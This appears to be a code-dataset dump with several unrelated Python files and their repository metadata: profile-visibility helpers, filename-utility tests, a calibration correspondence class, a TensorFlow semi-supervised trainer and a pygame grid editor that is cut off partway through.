extended_profile = []
for field_name in extended_profile_field_names:
extended_profile.append({
"field_name": field_name,
"field_value": extended_profile_fields_data.get(field_name, "")
})
return extended_profile
def get_profile_visibility(user_profile, user, configuration):
"""
Returns the visibility level for the specified user profile.
"""
if user_profile.requires_parental_consent():
return PRIVATE_VISIBILITY
# Calling UserPreference directly because the requesting user may be different from existing_user
# (and does not have to be is_staff).
profile_privacy = UserPreference.get_value(user, ACCOUNT_VISIBILITY_PREF_KEY)
if profile_privacy:
return profile_privacy
else:
return configuration.get('default_visibility')
def _visible_fields(user_profile, user, configuration=None):
"""
Return what fields should be visible based on user's preferences
:param user_profile: User profile object
:param user: User object
:param configuration: A visibility configuration dictionary.
:return: whitelist List of fields to be shown
"""
if not configuration:
configuration = settings.ACCOUNT_VISIBILITY_CONFIGURATION
profile_visibility = get_profile_visibility(user_profile, user, configuration)
if profile_visibility == ALL_USERS_VISIBILITY:
return configuration.get('bulk_shareable_fields')
elif profile_visibility == CUSTOM_VISIBILITY:
return _visible_fields_from_custom_preferences(user, configuration)
else:
return configuration.get('public_fields')
def _visible_fields_from_custom_preferences(user, configuration):
"""
Returns all fields that are marked to be shared with other users in the
given user's preferences. Includes fields that are always public.
"""
preferences = UserPreference.get_all_preferences(user)
fields_shared_with_all_users = [
field_name for field_name in configuration.get('custom_shareable_fields')
if preferences.get(f'{VISIBILITY_PREFIX}{field_name}') == 'all_users'
]
return set(fields_shared_with_all_users + configuration.get('public_fields'))
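Illustrative only, not part of the module above: the custom-visibility rule from _visible_fields_from_custom_preferences restated over plain dictionaries so it runs without Django; the 'visibility.' prefix and the field names are assumptions made for this demo.

VISIBILITY_PREFIX_DEMO = "visibility."  # assumed value of VISIBILITY_PREFIX for the demo

def visible_fields_from_custom_preferences_demo(preferences, configuration):
    # Mirrors the list comprehension above: share a field only if its per-field
    # preference is explicitly set to 'all_users', then add the always-public fields.
    shared = [
        field_name
        for field_name in configuration["custom_shareable_fields"]
        if preferences.get(f"{VISIBILITY_PREFIX_DEMO}{field_name}") == "all_users"
    ]
    return set(shared + configuration["public_fields"])

demo_configuration = {
    "custom_shareable_fields": ["bio", "country", "language_proficiencies"],
    "public_fields": ["username", "profile_image"],
}
demo_preferences = {"visibility.bio": "all_users", "visibility.country": "private"}
assert visible_fields_from_custom_preferences_demo(demo_preferences, demo_configuration) == {
    "username", "profile_image", "bio",
}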
| 845
| 1,265
| 426
|
c05dfe4ef31302a3269efbac97cf25db20c3b395
| 2,399
|
py
|
Python
|
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
tests/test_utils.py
|
noelhx/organize
|
d3eb2fe9d67e79f2b16b795aa923efcbfb3d9fb3
|
[
"MIT"
] | null | null | null |
from organize.utils import Path, find_unused_filename, splitglob, increment_filename_version
| 34.768116
| 92
| 0.654856
|
from organize.utils import Path, find_unused_filename, splitglob, increment_filename_version
def test_splitglob():
assert splitglob('~/Downloads') == (Path.home() / 'Downloads', '')
    assert (
        splitglob(r'/Test/\* tmp\*/*[!H]/**/*.*') ==
        (Path(r'/Test/\* tmp\*'), '*[!H]/**/*.*'))
assert (
splitglob('~/Downloads/Program 0.1*.exe') ==
(Path.home() / 'Downloads', 'Program 0.1*.exe'))
assert (
splitglob('~/Downloads/Program[ms].exe') ==
(Path.home() / 'Downloads', 'Program[ms].exe'))
assert (
splitglob('~/Downloads/Program.exe') ==
(Path.home() / 'Downloads' / 'Program.exe', ''))
def test_unused_filename_basic(mock_exists):
mock_exists.return_value = False
assert find_unused_filename(Path('somefile.jpg')) == Path('somefile 2.jpg')
def test_unused_filename_separator(mock_exists):
mock_exists.return_value = False
assert find_unused_filename(
Path('somefile.jpg'), separator='_') == Path('somefile_2.jpg')
def test_unused_filename_multiple(mock_exists):
mock_exists.side_effect = [True, True, False]
assert find_unused_filename(Path('somefile.jpg')) == Path('somefile 4.jpg')
def test_unused_filename_increase(mock_exists):
mock_exists.side_effect = [True, False]
assert find_unused_filename(
Path('somefile 7.jpg')) == Path('somefile 9.jpg')
def test_unused_filename_increase_digit(mock_exists):
mock_exists.side_effect = [True, False]
assert find_unused_filename(
Path('7.gif')) == Path('7 3.gif')
def test_increment_filename_version():
assert (
increment_filename_version(Path.home() / 'f3' / 'test_123.7z') ==
Path.home() / 'f3' / 'test_123 2.7z')
assert (
increment_filename_version(Path.home() / 'f3' / 'test_123_2 10.7z') ==
Path.home() / 'f3' / 'test_123_2 11.7z')
def test_increment_filename_version_separator():
assert increment_filename_version(
Path('test_123.7z'), separator='_') == Path('test_124.7z')
assert increment_filename_version(
Path('test_123_2.7z'), separator='_') == Path('test_123_3.7z')
def test_increment_filename_version_no_separator():
assert increment_filename_version(
Path('test.7z'), separator='') == Path('test2.7z')
assert increment_filename_version(
Path('test 10.7z'), separator='') == Path('test 102.7z')
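A hypothetical reference implementation consistent with the assertions above (the real function lives in organize.utils and may differ internally); it captures the rsplit-on-separator convention the tests encode.

from pathlib import Path as _Path

def increment_filename_version_demo(path, separator=' '):
    stem, suffix = path.stem, path.suffix
    try:
        base, version = stem.rsplit(separator, 1)
        new_stem = f'{base}{separator}{int(version) + 1}'
    except ValueError:
        # No "<separator><number>" suffix (or an empty separator): start a new version at 2.
        new_stem = f'{stem}{separator}2'
    return path.with_name(new_stem + suffix)

assert increment_filename_version_demo(_Path('test_123.7z')) == _Path('test_123 2.7z')
assert increment_filename_version_demo(_Path('test_123.7z'), separator='_') == _Path('test_124.7z')
assert increment_filename_version_demo(_Path('test 10.7z'), separator='') == _Path('test 102.7z')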
| 2,090
| 0
| 207
|
f8fca3440139ea2fefeb145c13dad62f93de1cce
| 4,767
|
py
|
Python
|
calibration_tool/correspondence/correspondence.py
|
liwen-deepmotion/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | 26
|
2021-04-24T08:07:20.000Z
|
2022-03-13T15:21:02.000Z
|
calibration_tool/correspondence/correspondence.py
|
Grandzxw/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | null | null | null |
calibration_tool/correspondence/correspondence.py
|
Grandzxw/map_based_lidar_camera_calibration_tool
|
d260380729b05b153c2efd1e76d4ae077c48c4b1
|
[
"MIT"
] | 9
|
2021-04-19T23:32:21.000Z
|
2022-03-03T06:31:19.000Z
|
from typing import Dict
import numpy as np
from actor.correspondence_actor import CorrespondenceActor
from shape.point_2d import Point2D
from shape.polyline_2d import Polyline2D
from shape.shape import Shape
| 34.294964
| 128
| 0.623872
|
from typing import Dict
import numpy as np
from actor.correspondence_actor import CorrespondenceActor
from shape.point_2d import Point2D
from shape.polyline_2d import Polyline2D
from shape.shape import Shape
class Correspondence(object):
def __init__(self, shape: Shape = None,
reprojected_shape: Shape = None,
correspondence_id: int = 0):
self._shape = shape
self._reprojected_shape = reprojected_shape
self._timestamp = int()
self._is_on_road = True
self._actor = CorrespondenceActor()
# This id is used in calibration_optimizer to index the
# according correspondences.
self._id = correspondence_id
def from_json_dict(self, json_dict: Dict):
# FIXME: fix the point correspondence loading bug.
if "annotation_segment" in json_dict:
shape_coords = json_dict['annotation_segment']
vector_coords = json_dict['hd_map_segment']
reprojected_coords = np.zeros(np.array(shape_coords).shape)
self._shape = Polyline2D(
np.array(shape_coords).reshape(-1, 2))
self._reprojected_shape = Polyline2D(
np.array(reprojected_coords).reshape((-1, 2)))
self._reprojected_shape.set_origin_vertices(
np.array(vector_coords).reshape((-1, 3)))
else:
shape_coords = json_dict['annotation_point']
vector_coords = json_dict['hd_map_point']
reprojected_coords = np.zeros(np.array(shape_coords).shape)
self._shape = Point2D(
np.array(shape_coords).reshape(-1, 2))
self._reprojected_shape = Point2D(
np.array(reprojected_coords).reshape((-1, 2)))
self._reprojected_shape.set_origin_vertices(
np.array(vector_coords).reshape((-1, 3)))
self._id = int(json_dict["id"])
self._is_on_road = json_dict['is_on_road']
def to_json_dict(self) -> Dict:
# TODO: Maybe inherit to remove the judgements.
if self.is_line_correspondence():
shape_coords = self._shape.coords().tolist()
vector_coords = self._reprojected_shape.origin_vertices().tolist()
shape_key = "annotation_segment"
vector_key = "hd_map_segment"
else:
shape_coords = self._shape.coords()[0].tolist()
vector_coords = self._reprojected_shape.origin_vertices()[0].tolist()
shape_key = "annotation_point"
vector_key = "hd_map_point"
json_dict = {
shape_key: shape_coords,
vector_key: vector_coords,
'id': self._id,
'is_on_road': self.is_on_road(),
}
return json_dict
def is_valid(self):
return self._shape is not None and \
self._reprojected_shape is not None and \
self._shape.size() == self._reprojected_shape.size()
def is_line_correspondence(self):
return self._shape.size() == 2
def shape(self) -> Shape:
return self._shape
def reprojected_shape(self) -> Shape:
return self._reprojected_shape
def timestamp(self) -> int:
return self._timestamp
def is_on_road(self) -> bool:
return self._is_on_road
def set_id(self, id_: int):
self._id = id_
def id(self) -> int:
return self._id
def set_shape(self, shape: Shape):
self._shape = shape
def set_reprojected_shape(self, shape: Shape):
self._reprojected_shape = shape
def set_timestamp(self, timestamp: int):
self._timestamp = timestamp
def set_is_on_road(self, is_on_road: bool):
self._is_on_road = is_on_road
def actor(self) -> CorrespondenceActor:
return self._actor
def build_actor(self):
self._actor.geometry().set_image_coords(self._shape.coords())
self._actor.set_correspondence_coords(
self._reprojected_shape.coords())
if self._is_on_road:
# blue = (0, 191, 255)
blue = (220, 20, 60)
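            # Despite the variable name, this RGB triple is crimson (220, 20, 60);
            # the actual blue value is the commented-out (0, 191, 255) above.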
self._actor.property().set_color(*blue)
self._actor.set_point_color(blue)
else:
pink = (220, 20, 60)
self._actor.property().set_color(*pink)
self._actor.set_point_color(pink)
self._actor.set_correspondence_color((255, 255, 0))
self._actor.property().set_line_width(5)
return self._actor
def __str__(self):
return 'Correspondence: shape_coords: {}, vector_coords: {}, vector_vertices:{}, timestamp: {}'.format(
self._shape.coords(), self._reprojected_shape.coords(), self._reprojected_shape.origin_vertices(), self.timestamp())
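A minimal, hypothetical usage sketch (not part of the original file): it pushes a hand-written JSON dict through the from_json_dict/to_json_dict helpers above. The coordinate values are invented, and it assumes Polyline2D reports its vertex count via size() and exposes coords()/origin_vertices(), as the methods above already rely on.

if __name__ == '__main__':
    example_json = {
        'annotation_segment': [[10.0, 20.0], [30.0, 40.0]],
        'hd_map_segment': [[1.0, 2.0, 0.0], [3.0, 4.0, 0.0]],
        'id': 1,
        'is_on_road': True,
    }
    correspondence = Correspondence()
    correspondence.from_json_dict(example_json)
    assert correspondence.id() == 1 and correspondence.is_on_road()
    assert correspondence.to_json_dict()['hd_map_segment'] == example_json['hd_map_segment']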
| 4,040
| 8
| 509
|
c14b091cf5862855f63fbbe263409ba8262d2632
| 12,598
|
py
|
Python
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 61
|
2019-06-06T19:22:14.000Z
|
2022-03-24T01:38:59.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 3
|
2019-07-22T14:24:55.000Z
|
2020-09-30T09:15:34.000Z
|
cclp/neuralnet/trainers/trainers.py
|
Kamnitsask/ssl_compact_clustering
|
19938d295493f6c9f2c19a60ccb1bb9a3596906c
|
[
"Apache-2.0"
] | 10
|
2019-06-06T18:41:27.000Z
|
2022-03-24T01:39:13.000Z
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
# A class separate than the model, to keep separately the optimization state.
| 54.301724
| 230
| 0.656057
|
#!/usr/bin/env python
# Copyright (c) 2018, Konstantinos Kamnitsas
#
# This program is free software; you can redistribute and/or modify
# it under the terms of the Apache License, Version 2.0. See the
# accompanying LICENSE file or read the terms at:
# http://www.apache.org/licenses/LICENSE-2.0
from __future__ import absolute_import, division, print_function
import logging
LOG = logging.getLogger('main')
import tensorflow as tf
from cclp.routines.schedules.schedules import apply_growth
from cclp.neuralnet.trainers import losses
class Trainer(object):
# A class separate than the model, to keep separately the optimization state.
def __init__(self, params, net_model, t_sup_labels):
self._params = params # A dictionary or dictionary-like ConfigFlags.
self._ema = tf.train.ExponentialMovingAverage(decay=0.99)
self._loss_total_weighted = self._setup_losses( net_model, t_sup_labels )
self._t_learning_rate = self._get_t_learning_rate( net_model ) # Can be returning scalar or tensor (eg from schedule).
self._train_op = self._create_train_op()
self._increase_model_step_op = tf.assign( net_model.get_t_step(), net_model.get_t_step() + 1)
tf.summary.scalar( 'Loss_Total_weighted', self._loss_total_weighted )
tf.summary.scalar( 'Learning_Rate', self._t_learning_rate )
def _setup_losses(self, net_model, t_sup_labels):
# net_model: Instance of ./cclp/neuralnet/models/classifier/Classifier.
losses.add_softmax_cross_entr( logits = net_model.tensor_families["train_sup"]["logits_tens"],
lbls = t_sup_labels,
weight = self._params["logit_weight"] )
if self._params["cc_loss_on"]:
losses.add_cclp_loss(
Z_l = net_model.tensor_families["train_sup"]["emb_z_tens"],
Z_u = net_model.tensor_families["train_unsup"]["emb_z_tens"],
y_l_lbls = t_sup_labels,
c_classes = net_model.get_num_classes(),
# Params for creating the graph
sim_metric = self._params["cc_sim_metric"],
l2_sigmas = self._params["cc_l2_sigmas_init"],
l2_sigmas_trainable = self._params["cc_l2_sigmas_trainable"],
# Params for CCLP loss
cclp_weight = self._params["cc_weight"],
cclp_steps = self._params["cc_steps"],
sum_over_chains = self._params["cc_sum_over_chains"],
# Others
e_smooth = self._params["cc_e_smooth"],
optim_smooth_mtx = self._params["cc_optim_smooth_mtx"] )
loss_total_weighted = tf.losses.get_total_loss(add_regularization_losses=True) # tf keeps track of everything. Losses registered eg in add_logit_loss and L2 are here.
return loss_total_weighted
def _get_t_learning_rate(self, net_model):
# Set up learning rate
if self._params["lr_sched_type"] == 'expon_decay':
t_learning_rate = tf.maximum( tf.train.exponential_decay( self._params["lr_expon_init"], net_model.get_t_step(), self._params["lr_expon_decay_steps"], self._params["lr_expon_decay_factor"], staircase=True),
self._params["lr_min_value"])
elif self._params["lr_sched_type"] == 'piecewise':
# In github it was said that piecewise was used for svhn.
t_learning_rate = tf.maximum( tf.train.piecewise_constant( net_model.get_t_step(), boundaries = [ tf.cast(v, tf.int32) for v in self._params["lr_piecewise_boundaries"] ], values = self._params["lr_piecewise_values"] ),
self._params["lr_min_value"])
return t_learning_rate
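    # Illustrative note on the schedule above: with staircase=True the exponential branch
    # evaluates to max(lr_init * decay_factor ** (step // decay_steps), lr_min_value).
    # With made-up values lr_init=1e-3, decay_factor=0.5, decay_steps=100, that yields
    # 1e-3 for steps 0-99 and 5e-4 for steps 100-199.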
def _get_grads_after_calc_grads_and_g_to_v_per_loss(self, list_of_trainable_vars):
# Get all losses
list_of_all_added_losses = tf.losses.get_losses() # THIS DOES NOT INCLUDE REGULARIZATION LOSSES!
# ... See last line: https://github.com/tensorflow/tensorflow/blob/r1.5/tensorflow/python/ops/losses/util.py
list_of_all_added_losses += tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) # This is where L2 is placed.
LOG.debug("list_of_all_added_losses = " + str(list_of_all_added_losses) )
LOG.debug("tf.get_collection( tf.GraphKeys.REGULARIZATION_LOSSES ) = " + str(tf.get_collection(tf.GraphKeys.REGULARIZATION_LOSSES)) )
list_of_grads_for_each_var_per_loss = [] # will be of shape NumLosses x numVars
for loss in list_of_all_added_losses:
LOG.info('Computing grads of each var wrt Loss: '+loss.name )
grads_for_this_loss = tf.gradients( loss, list_of_trainable_vars )
list_of_grads_for_each_var_per_loss.append( grads_for_this_loss )
# Now that you have for each variable, the gradients from the different losses separately, compute the ratios to the variable's value, and an ema to report.
list_of_loss_names_to_print_ratios = ['loss_logit_weighted', 'loss_LP_unl_entr_weighted', 'loss_hop0_weighted',
'loss_hop1_weighted', 'loss_hop2_weighted', 'loss_hop3_weighted', 'loss_hop4_weighted', 'loss_hop5_weighted',
'loss_hopNeg0_weighted' ]
list_of_ema_update_ops = []
for loss_i in range( len(list_of_all_added_losses) ) :
this_loss_name = list_of_all_added_losses[loss_i].name
if any( [ this_loss_name.startswith( name_of_interest ) for name_of_interest in list_of_loss_names_to_print_ratios ] ):
LOG.debug('LOSS FOUND! this_loss_name='+this_loss_name)
grads_for_this_loss = list_of_grads_for_each_var_per_loss[loss_i]
sum_of_all_pow2_grads = 0
sum_of_all_pow2_vars = 0
for grad, var in zip( grads_for_this_loss, list_of_trainable_vars ):
# Each "grad" is of different shape. eg a tensor of shape [3,3,32,32] for conv, or [3] for bias, etc. So I need to treat them carefully.
# Same for Variables tensors.
if grad is None:
continue # eg in the case that a var does not depend on a loss. eg classif layer to auxiliary losses.
sum_of_all_pow2_grads += tf.reduce_sum( tf.pow(grad, 2) )
sum_of_all_pow2_vars += tf.reduce_sum( tf.pow(var, 2) )
norm_grads = tf.sqrt( sum_of_all_pow2_grads )
norm_vars = tf.sqrt( sum_of_all_pow2_vars )
ratio_g_to_v = norm_grads / norm_vars
# Maintain and report a moving average for each ratio:
list_of_ema_update_ops.append( self._ema.apply([ratio_g_to_v]) )
ema_ratio_g_to_v = self._ema.average( ratio_g_to_v )
tf.summary.scalar('RatioGtoV_'+this_loss_name, ema_ratio_g_to_v)
# Add up the gradients from each different loss into one total gradient for each variable, that the optimizer will then apply
grads_total_for_each_var = None
for grads_wrt_specific_loss in list_of_grads_for_each_var_per_loss:
if grads_total_for_each_var is None:
grads_total_for_each_var = grads_wrt_specific_loss
else:
assert len(grads_total_for_each_var) == len(grads_wrt_specific_loss)
num_var_n_grad_tensors = len(grads_total_for_each_var)
for grad_i in range( num_var_n_grad_tensors ):
if grads_wrt_specific_loss[grad_i] is None:
continue # eg if a loss does not depend on a variable. Eg, LP losses wrt classification layer.
elif grads_total_for_each_var[grad_i] is None: # eg if the corresponding variable was independent of the very first loss.
grads_total_for_each_var[grad_i] = grads_wrt_specific_loss[grad_i]
else:
grads_total_for_each_var[grad_i] = grads_total_for_each_var[grad_i] + grads_wrt_specific_loss[grad_i]
return grads_total_for_each_var, list_of_ema_update_ops
def _create_train_op(self):
list_of_optimizers = []
list_of_trainable_var_collections = []
list_of_train_ops = []
"""
LOG.debug("***** Are we correctly getting update ops of BN? *****" )
LOG.debug("tf.get_collection(tf.GraphKeys.UPDATE_OPS)=" + str( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) )
LOG.debug("len( tf.get_collection(tf.GraphKeys.UPDATE_OPS) ) = " + str( len(tf.get_collection(tf.GraphKeys.UPDATE_OPS)) ) )
for thing in tf.get_collection(tf.GraphKeys.UPDATE_OPS):
LOG.debug( "thing = " + str(thing) )
"""
# Make main op, training all the tf.GraphKeys.TRAINABLE_VARIABLES. All separately trained are in different collections.
trainable_vars_main = tf.get_collection( tf.GraphKeys.TRAINABLE_VARIABLES )
        list_of_trainable_var_collections.append( trainable_vars_main ) # concatenate all trainable vars in a list/collection.
optimizer_main = tf.train.AdamOptimizer( self._t_learning_rate, beta1=0.9, beta2=0.999, epsilon=1e-07 )
#optimizer_main = tf.train.RMSPropOptimizer( self._t_learning_rate, decay=0.9, momentum=0.6, epsilon=1e-8 )
#optimizer_main = tf.train.MomentumOptimizer( self._t_learning_rate, momentum=0.9, use_nesterov=True )
list_of_optimizers.append( optimizer_main )
if self._params["cc_loss_on"] and self._params["cc_sim_metric"] == "L2" and self._params['cc_l2_sigmas_trainable']:
trainable_lp_l2_sigmas = tf.get_collection( 'TRAINABLE_LP_L2_SIGMAS' )
list_of_trainable_var_collections.append( trainable_lp_l2_sigmas )
optimizer_sigmas = tf.train.AdamOptimizer( self._t_learning_rate * self._params['cc_l2_sigmas_lr_multipl'] )
list_of_optimizers.append( optimizer_sigmas )
# Add more "special" trainable var collections here if needed...
# Get all trainable vars in one list
list_of_trainable_vars = [ var for sublist in list_of_trainable_var_collections for var in sublist ]
if self._params["track_ratio_g_v"] :
LOG.debug("Going to calculate grads per loss separately, to track ratio of grads/var. Slow." )
# grads_total_for_each_var: total gradient for each variable. shape: number of variables.
# list_of_ema_update_ops: one for each tracked loss in list_of_loss_names_to_print_ratios
grads_total_for_each_var, list_of_ema_update_ops = self._get_grads_after_calc_grads_and_g_to_v_per_loss(list_of_trainable_vars)
else :
LOG.debug("Not tracking grads/var. Calc grad from total_loss." )
grads_total_for_each_var = tf.gradients( self._loss_total_weighted, list_of_trainable_vars )
list_of_ema_update_ops = []
# Now lets apply the grads to the parameters, with the appropriate optimiser / learningRate.
low_counter = 0
for i in range( len(list_of_trainable_var_collections) ) :
var_collection = list_of_trainable_var_collections[i]
high_counter = low_counter+len(var_collection)
grads_for_this_var_collection = grads_total_for_each_var[ low_counter: high_counter ]
optimizer = list_of_optimizers[i]
train_op = optimizer.apply_gradients( zip(grads_for_this_var_collection, var_collection) )
list_of_train_ops.append(train_op)
low_counter = high_counter
all_ops_to_run_at_one_train_step = list_of_train_ops
all_ops_to_run_at_one_train_step += list_of_ema_update_ops
all_ops_to_run_at_one_train_step += tf.get_collection(tf.GraphKeys.UPDATE_OPS) # This one keeps updates of Batch normalization.
total_train_op = tf.group( *all_ops_to_run_at_one_train_step )
return total_train_op
def get_train_op(self):
return self._train_op
def get_increase_model_step_op(self):
return self._increase_model_step_op
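# A minimal usage sketch of the two ops exposed above, assuming a trainer
# instance of this class has already been built by the surrounding project and
# a tf.Session with initialized variables is available; `trainer`, `sess` and
# `num_train_steps` below are placeholder names, not part of the original code.
def _example_training_loop(trainer, sess, num_train_steps):
    train_op = trainer.get_train_op()
    incr_step_op = trainer.get_increase_model_step_op()
    for _ in range(num_train_steps):
        sess.run(train_op)        # one optimization step (grads + BN/EMA updates)
        sess.run(incr_step_op)    # advance the model's global step counter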
| 11,708
| 1
| 235
|
2a69b09f93d4e645ddd5130d2759a0551e9cb112
| 9,363
|
py
|
Python
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | 1
|
2018-08-02T19:42:35.000Z
|
2018-08-02T19:42:35.000Z
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | 1
|
2018-08-02T19:41:58.000Z
|
2018-08-05T17:53:17.000Z
|
PyEvolv/grid_creator/grid_creator.py
|
peerlator/PyEvolv
|
7f5644e2ea22257f34547c9b050bc4cdd4f3bdec
|
[
"MIT"
] | null | null | null |
import pygame
import numpy as np
import colorsys
from typing import List, Union, Tuple
import os
from PyEvolv.grid_creator.Sidebar import Sidebar
from PyEvolv.assets.font import FONT
| 47.770408
| 281
| 0.610061
|
import pygame
import numpy as np
import colorsys
from typing import List, Union, Tuple
import os
from PyEvolv.grid_creator.Sidebar import Sidebar
from PyEvolv.assets.font import FONT
class GridCreator:
def __init__(self,display_width:int, display_height:int, grid:np.ndarray, grids_path:str, relatives_on_screen:int, y:int=50, sidebar_bg:Tuple[int, int, int]=(255,255,255), sidebar_primary:Tuple[int, int, int]=(0,0,0), sidebar_secondary: Tuple[int, int, int]=(0,0,255)) -> None:
"""The GridCreator class helps with creation of grids for the Game
Arguments:
display_width {int} -- The amount of pixels the window is wide
display_height {int} -- The amount of pixels the window is high
grid {np.array} -- The starting grid
relatives_on_screen {int} -- The amount of relatives displayed on the screen at the beginning
Keyword Arguments:
sidebar_bg {tuple} -- The bg color of the sidebar in RGB (default: {(255,255,255)})
sidebar_primary {tuple} -- The primary color of the sidebar in RGB (default: {(0,0,0)})
sidebar_secondary {tuple} -- The second primary color of the sidebar in RGB (default: {(0,0,255)})
"""
self.display_width = display_width
self.display_height = display_height
self.relative_x = 0
self.relative_y = 0
self.grid = grid
self.grids_path = grids_path
self.relative_x_change = 0
self.relative_y_change = 0
self.relatives_on_screen = relatives_on_screen
self.y = y
self.font = FONT
self.surf = pygame.Surface((display_width,display_height))
pygame.display.set_caption('GridCreator')
self.sidebar_width = display_width-display_height
self.map_surf = pygame.Surface((display_height, display_height))
self.sidebar = Sidebar(self.sidebar_width, self.display_height, self.y, background_color=sidebar_bg, primary_color=sidebar_primary, secondary_color=sidebar_secondary)
        self.brush:List[Union[List[float], float]] = [[0, 0, 1], 0, 0] # [color in HSV, tile_x, tile_y]
def next_frame(self) -> None:
"""The next frame. Handles events and displays everything
"""
self.relative_x = min(max(0, self.relative_x + self.relative_x_change), 10*self.grid.shape[0] - self.relatives_on_screen)
self.relative_y = min(max(0, self.relative_y + self.relative_y_change), 10*self.grid.shape[1] - self.relatives_on_screen)
self._sidebar_controller()
self.sidebar.next_frame()
self.map_surf.fill((0,0,0))
self._display_grid(self.map_surf)
self.surf.blit(self.map_surf, (self.sidebar_width, 0))
self.surf.blit(self.sidebar.sidebar_surf, (0, 0))
def controller(self, event:pygame.event) -> None:
self.sidebar.controller(event)
self._grid_controller(event)
self._brush_controller(event)
def _brush_controller(self, event:pygame.event) -> None:
"""The controller for the brush
Arguments:
event {event} -- a single event from pygame.event.get()
"""
color_picker_used = self.sidebar.color_picker
if event.type == pygame.MOUSEBUTTONDOWN:
if self.sidebar_width < event.pos[0] and event.button == 1:
if self.sidebar.color_picker or self.sidebar.fill:
relatives_per_pixel = self.relatives_on_screen / self.display_height
relative_mouse_x = (event.pos[0] - self.sidebar_width) * relatives_per_pixel
relative_mouse_y = (event.pos[1]-self.y) * relatives_per_pixel
tile_x = int(self.relative_x//10 + relative_mouse_x // 10)
tile_y = int(self.relative_y//10 + relative_mouse_y // 10)
if self.sidebar.color_picker:
self.sidebar.color_picker = False
self.brush[0] = self.grid[tile_x, tile_y]
self.sidebar.update_slider(int(self.brush[0][0] * (self.sidebar_width-60)), int(self.brush[0][1] * (self.sidebar_width-60)))
self.grid[tile_x, tile_y] = self.brush[0]
elif self.sidebar.fill:
self._flood_fill(tile_x, tile_y, list(self.grid[tile_x, tile_y]), self.brush[0])
elif event.type == pygame.MOUSEMOTION and event.buttons[0] == 1 and not color_picker_used:
if event.pos[0] - self.sidebar_width > 0:
relatives_per_pixel = self.relatives_on_screen / self.display_height
relative_mouse_x = (event.pos[0] - self.sidebar_width) * relatives_per_pixel
relative_mouse_y = (event.pos[1]-self.y) * relatives_per_pixel
self.brush[1] = int(self.relative_x//10 + relative_mouse_x // 10)
self.brush[2] = int(self.relative_y//10 + relative_mouse_y // 10)
self.grid[self.brush[1], self.brush[2]] = self.brush[0]
def _sidebar_controller(self) -> None:
"""Connection betwenn Sidebar Class and GridCreator Class
"""
        self.brush[0][0] = self.sidebar.slider_1_val / (self.sidebar_width-60)
        self.brush[0][1] = self.sidebar.slider_2_val / (self.sidebar_width-60)
if self.sidebar.water:
self.brush[0] = [0, 0, 0]
else:
self.brush[0] = [self.sidebar.slider_1_val / (self.sidebar_width-60), self.sidebar.slider_2_val / (self.sidebar_width-60), 1]
if self.sidebar.save:
try:
np.save(self.grids_path + self.sidebar.grid_name + ".npy", self.grid)
self.sidebar.save = False
except:
pass
if self.sidebar.load:
try:
np.save(self.grids_path + ".autosave.npy", self.grid)
self.grid = np.load(self.grids_path + self.sidebar.grid_name + ".npy")
self.sidebar.load = False
except:
pass
def _grid_controller(self, event:pygame.event) -> None:
"""The Grid Controller to zoom and move through the grid
Arguments:
event {event} -- A single event from pygame.event.get()
"""
if event.type == pygame.KEYDOWN:
if event.key == pygame.K_LEFT:
self.relative_x_change = -5
elif event.key == pygame.K_RIGHT:
self.relative_x_change = 5
if event.key == pygame.K_DOWN:
self.relative_y_change = 5
elif event.key == pygame.K_UP:
self.relative_y_change = -5
if event.type == pygame.KEYUP:
if event.key == pygame.K_LEFT or event.key == pygame.K_RIGHT:
self.relative_x_change = 0
if event.key == pygame.K_UP or event.key == pygame.K_DOWN:
self.relative_y_change = 0
if event.type == pygame.MOUSEBUTTONDOWN:
if event.button == 4:
self.relatives_on_screen = min(max(10, self.relatives_on_screen + 6), self.grid.shape[0]*10)
elif event.button == 5:
self.relatives_on_screen = min(max(10, self.relatives_on_screen - 6), self.grid.shape[0]*10)
    def _display_grid(self, gameDisplay:pygame.Surface) -> None: # TODO: only loop over the visible tiles instead of checking every tile
"""Displays the grid on the gameDisplay
Arguments:
gameDisplay {pygame.Surface} -- The surface to display the grid on
"""
pixels_per_relative = self.display_height / self.relatives_on_screen
for x in range(self.grid.shape[0]):
for y in range(self.grid.shape[1]):
if self.relative_x <= x*10 <= self.relative_x + self.relatives_on_screen and self.relative_y <= y*10 <= self.relative_y + self.relatives_on_screen:
color = self.grid[x, y]
color = np.asarray(colorsys.hsv_to_rgb(color[0], color[1], color[2]))*255
pygame.draw.rect(gameDisplay, (int(color[0]), int(color[1]), int(color[2])), (x*10*pixels_per_relative - self.relative_x*pixels_per_relative, y*10*pixels_per_relative - self.relative_y*pixels_per_relative, pixels_per_relative*10, pixels_per_relative*10))
def _flood_fill(self, x:int, y:int, old_color:List[float], new_color:List[float]) -> None:
"""The 4flood fill algorithm
Arguments:
x {int} -- the x coordinate of the tile where the fill algo starts on
y {int} -- the y coordinate of the tile where the fill algo starts on
old_color {list} -- The old color of the grid tile in HSV
